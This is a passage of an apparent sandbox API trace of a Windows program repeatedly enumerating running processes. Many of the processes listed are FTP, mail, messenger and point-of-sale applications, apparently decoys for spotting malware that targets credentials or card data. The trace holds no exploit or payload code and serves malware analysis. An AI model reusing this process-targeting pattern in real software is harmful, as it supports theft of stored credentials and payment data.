th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0168.465] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0168.468] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0168.470] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.472] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0168.474] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0168.476] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0168.479] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0168.481] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.483] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0168.485] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0168.487] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0168.489] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0168.491] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0168.606] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0168.608] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0168.611] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0168.613] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0168.615] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0168.618] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0168.621] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0168.623] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0168.625] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0168.627] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0168.629] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0168.632] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0168.634] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0168.636] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0168.638] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0168.646] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0168.648] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0168.652] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0168.654] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0168.657] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0168.660] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0168.663] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0168.666] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0168.668] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0168.671] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0168.674] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0168.676] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0168.679] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0168.684] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0168.687] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0168.689] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0168.692] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0168.695] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0168.697] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0168.700] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0168.703] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0168.705] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0168.708] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0168.710] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0168.713] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0168.715] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0168.718] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0168.727] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0168.729] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0168.731] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0168.733] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0168.736] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0168.740] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0168.743] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0168.745] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0168.748] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0168.751] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0168.754] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0168.756] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0168.757] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0168.760] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0168.764] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0168.766] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0168.768] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0168.770] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0168.772] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0168.775] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0168.777] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0168.780] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0168.783] Process32Next (in: hSnapshot=0x1a88, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0168.786] CloseHandle (hObject=0x1a88) returned 1 [0168.786] Sleep (dwMilliseconds=0x64) [0168.936] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2074 [0168.952] Process32First (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0168.954] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0168.957] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0168.960] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0168.962] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0168.965] Process32Next (in: hSnapshot=0x2074, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, 